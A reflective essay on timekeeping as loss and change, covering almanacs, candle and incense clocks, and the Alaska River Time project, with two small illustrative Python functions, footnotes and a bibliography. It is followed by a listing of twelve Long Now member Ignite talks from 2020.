Keeping time is the work carried on by many before me and is one of the only things we still have in common with pre-Homo sapiens. We have measured time by seasons, famine, light, and darkness, our almanacs a result of such tidings.² These tomes, published yearly, include such things as tide tables, dates of eclipses and the movements of celestial bodies, and religious festivities. They recommend planting times for crops, give weather forecasts, and record the rising and setting of the sun and moon.³ Yet none of these things truly indicate the inevitable passing of time. Only one thing changes on a molecular level from second to second. From the moment before and after a baby is born, or the instant when your loved one is still taking in breath to the moment when they are gone — the moment when you are present tense to the moment when you are past. A loss of heat is the only thing that indicates the passing of time.⁴ The more I have studied time, the more ethereal it becomes. It manifests as water in its different forms, and much like a snowflake, it melts the longer you hold it or try to study it.⁵ Like a snowflake, each person's experience of time is different. It cannot be regulated. Time is a personal manifestation of our perception of the space we occupy, truly unique to each of us. It is a strange fact that our heads age faster than our feet. A shorter person is younger than you if you were born at the same instant in time.⁶ Even if time could be measured by some concrete means, our experience of time changes throughout our lives due to physical changes that occur in our brain.⁷ We cannot hold time, possess it, buy it, earn it, or commodify it. It may be the one thing we cannot commodify. Our experience of time changes, one day based on what we have gained and another through what we have lost, or more concisely put, what has changed.

Al-Jaziri’s candle clock (01305). Source: Freer Gallery of Art.

Perhaps one of the oldest methods of telling time through a loss or change principle is the candle clock. The earliest ones were often long, thin candles with marked intervals to indicate the passing of hours as the candle burned down.⁸ Later variations included dials and even automata.⁹ The chemistry of a candle, simply explained, is as follows: you light a candle, and the heat from the flame melts the wax, which becomes liquid. This liquid is then drawn up into the wick via capillary action. The heat from the flame vaporizes the liquid wax, turning it to gas, which is then drawn into the flame, creating heat and light. Enough heat is created to continue this cycle until the wax is exhausted.¹⁰
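The principle behind such a clock can be reduced to a single calculation: wax consumed, divided by a pre-calibrated burn rate. A minimal sketch, assuming a constant burn rate (the function name and values here are illustrative, not drawn from any historical source):

```python
def elapsed_hours(initial_length_cm: float,
                  current_length_cm: float,
                  burn_rate_cm_per_hour: float) -> float:
    """Elapsed time read from a candle clock: the length of wax consumed
    divided by the calibrated burn rate."""
    if not 0 <= current_length_cm <= initial_length_cm:
        raise ValueError("current length must be between 0 and the initial length")
    return (initial_length_cm - current_length_cm) / burn_rate_cm_per_hour

# A 30 cm candle calibrated at 2.5 cm per hour, now burned down to 20 cm:
print(elapsed_hours(30.0, 20.0, 2.5))  # → 4.0
```

An incense clock works on the same loss principle, substituting a known rate of combustion for the burn rate of wax.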

Chinese incense clock. Source: Science Museum Group(CC BY-NC-SA 4.0).

Incense clocks work in a similar fashion and at times were just as elaborate with bells and gongs, pulleys, and dials. The simplest form was that of an incense stick calibrated to burn at a known rate of combustion. Hours, minutes, and days were passed in witness of the incense stick.¹¹ Yet these forms of telling time through loss are based on confined, predictable, known systems. Our time is not. Our bodies are not like candles or incense sticks and yet we deteriorate with time, changed by factors such as our environment, toxins, or disease that can accelerate the deterioration of our bodies. Change is the body’s way of knowing time.

This may not leave one feeling very grounded in their experience of time, yet our individual perception is all that we have. Life by nature is fleeting. It does not outlast time. Our life is finite and time continues. That is one of the great consolations time can offer. When loss is too great to bear, remember the age-old adage, "everything passes with time." There is wisdom in this idea, carried across cultures. In the Cheyenne Native American tribe, there was a saying told to those ailing, going into battle, or suffering the losses that life brings,

My friends,

Only the stones

Stay on Earth forever

Use your best ability¹²

Though stones change, they do stay. They lose their original primeval form, eventually becoming something only recognizable through magnification. Their erosion is an indicator of time, much like seasons. The degradation of all materials, organic and inorganic, is irreversible and inevitable. To calculate the passing of time through the lens of water eroding stone is a manifestation of nature’s experience of time. Time is based here on the flow rate of the river. It is season based, environment based, climate based, degradation based and is impacted both negatively and positively through the cumulative actions of human beings.

Alaska River Time engages a network of glacial and spring rivers to regulate a new kind of clock, which speeds up and slows down with the waters. The clock can be used to recalibrate all aspects of life from work schedules to personal relationships. Source: Alaska River Time.

The Alaska River Time project of Jonathon Keats brings about an intentional unification between nature’s experience of time and our perception of its passing, while bringing to light our direct impact on it. We are both forced to bear witness and invited to engage. It is not unlike the time realized in our bodies, but here through known bodies of water.

I’d like to say that River Time can offer a more accurate timekeeping system than the finest atomic clock, quartz watch, or mechanical timekeeper, as it provides a true reflection of time through real change. I realize that it is unpredictable, and that the flow rate of a river depends on many factors that the river is forced to exist within, factors it cannot control but can only experience. Perhaps it is this unpredictability which is its greatest asset.
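The idea of a clock regulated by a river can be sketched in a few lines: each interval of wall-clock time is stretched or shrunk by the ratio of the measured flow to some reference flow. This is my own hedged illustration of the concept described above; the function names, units, and reference value are assumptions, not part of the Alaska River Time project's actual implementation.

```python
def river_seconds(flow_samples_m3s, reference_flow_m3s, sample_interval_s):
    """Accumulate 'river time': each real sampling interval is scaled by
    the ratio of measured river flow to a chosen reference flow, so the
    clock runs fast when the river runs fast and slow when it slows."""
    total = 0.0
    for flow in flow_samples_m3s:
        total += sample_interval_s * (flow / reference_flow_m3s)
    return total

# One hour of real time sampled every 15 minutes (900 s). The river runs
# above the reference flow, then below it, so river time drifts away
# from wall-clock time and back again.
samples = [120.0, 110.0, 90.0, 80.0]  # cubic metres per second
print(river_seconds(samples, 100.0, 900.0))  # ≈ 3600 river seconds
```

The design choice mirrors the essay's point: the clock's rate is not a property of the mechanism but of the environment it witnesses.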


[1] Jonathan Betts, John Harrison: inventor of the precision timekeeper.

[2] “The term almanac is of uncertain medieval Arabic origin; in modern Arabic, al-manākh is the word for climate,” From the Encyclopaedia Britannica.

[3] Encyclopaedia Britannica.

[4] Carlo Rovelli, The Order of Time.

[5] Carlo Rovelli, The Order of Time.

[6] Carlo Rovelli, The Order of Time.

[7] David Eagleman, Livewired: The Inside Story of the Ever-Changing Brain.

[8] H.H. Cunynghame, Time and Clocks: A Description of Ancient and Modern Methods of Measuring Time.

[9] Alfred Chapuis, Le Monde des Automates.

[10] Encyclopaedia Britannica.

[11] N.H.N Mody, Japanese Clocks.

[12] Paul Goble, The Boy and His Mud Horses: and Other Stories from the Tipi.


Alfred Chapuis and Edouard Gelis, Le Monde des Automates: Etude Historique et Technique (Paris: 1928), Pages 51–68.

Britannica, T. Editors of Encyclopaedia. “Almanac.” Encyclopedia Britannica, January 25, 2018.

Britannica, T. Editors of Encyclopaedia. “Candle.” Encyclopedia Britannica, July 20, 2019.

Carlo Rovelli, The Order of Time (New York: Riverhead Books, 2018), Pages 3, 10, 25.

David Eagleman, Livewired: The Inside Story of the Ever-Changing Brain (New York: Pantheon, 2020).

H.H. Cunynghame, Time and Clocks: A Description of Ancient and Modern Methods of Measuring Time (Detroit: Single Tree Press, 1970), Page 46.

Jonathan Betts, John Harrison: inventor of the precision timekeeper. Endeavour Volume 17, Issue 4, 1993, Pages 160–167.

N.H.N Mody, Japanese Clocks (Japan: Charles E. Tuttle Company, Inc., 1977), Plate 114.

Paul Goble, The Boy and His Mud Horses: and Other Stories from the Tipi (China: World Wisdom, Inc., 2010).

Recommended Reading

  • Desert Solitaire by Edward Abbey
  • The Order of Time by Carlo Rovelli
  • The Sound of a Wild Snail Eating by Elisabeth Tova Bailey

Learn More

  • Watch Brittany Cox’s 02019 Interval talk, “Horological Heritage.”
  • Watch Jonathon Keats’s 02015 Interval talk, “Envisioning Deep Time.”
  • Pre-order Jonathon Keats’s forthcoming book, Thought Experiments: The Art of Jonathon Keats.

This essay was commissioned by the Anchorage Museum and was originally published on the Alaska River Time website.


LongNowLong Now Member Ignite Talks 02020

With thousands of members from all around the world, from artists and writers to engineers and farmers, the Long Now community has a wide range of perspectives, stories, and experience to offer.

On October 20, 02020, we heard 12 of them in a curated set of short Ignite talks given by Long Now Members. What’s an Ignite talk? It’s a story format created by Brady Forrest and Bre Pettis that’s exactly 5 minutes long, told by a speaker who’s working with 20 slides that auto-advance every 15 seconds (ready or not).

These 12 Ignite talks ranged from the geeky and fanciful to the poignant and educational, with some fresh angles on long-term thinking. We’re pleased to share them with you below.

Collaborating with Insects

Catherine Chalmers

Long Now Member Catherine Chalmers guides us through her multimedia “American Cockroach Project”—a 10-year investigation into humanity’s adversarial relationship with nature.

Activism as Futurism: Imagining Better Worlds

Allison Cooper

Long Now Member Allison Cooper encourages us to widen our windows on what is possible, plausible, probable, and preferable.

Change Agents (and How to Become One)

Danese Cooper

Long Now Member Danese Cooper shares a personal journey — of being changed by the world, and changing the world.

Instant stone (just add water!)

Jason Crawford

Long Now Member Jason Crawford shares the story of concrete, a sufficiently advanced technology indistinguishable from magic.

Plastic Mathematics in the Clock

Stewart Dickson

Long Now Member Stewart Dickson recounts the Equation of Time’s journey from mathematical equation, to 3D model, to machined-metal cam for the Clock of the Long Now.

Deep Fakes & The Archaic Revival

Michael Garfield

Long Now Member Michael Garfield tells a story about the end of reality. Not the end of the world, but the end of the idea of one consensus world.

The Great Dead End

Quentin Hardy

Long Now Member Quentin Hardy uses the historical example of Siena, Italy to suggest that our present plague-year will have downstream cultural effects for generations.

The Future of Storytelling

Asmara Marek

Long Now Member Asmara Marek points at paths forward for the future of storytelling.

Our future drugs will come from the oceans; Can we save them in time?

Louis Metzger

Long Now Member Louis Metzger explains how our individual and collective well-being is intimately dependent on the preservation of ocean biodiversity.

Leways: The Story of a Chinatown Pool Hall

Marc Pomerleau

Long Now Member Marc Pomerleau gives us a glimpse of a Chinatown past, and a vision of its vitality rediscovered in a Chinatown future.

Art and Time

Madeline Sunley

Long Now Member Madeline Sunley shares her ideas & process for making oil paintings of marking systems for communication with the far future.

A Longer Now

Scott Thrift

Long Now Member Scott Thrift creates analog tools that tune our awareness to the perennial cycles of the day, the moon, and the year, so we can collectively rediscover the original nature of time–and a longer now.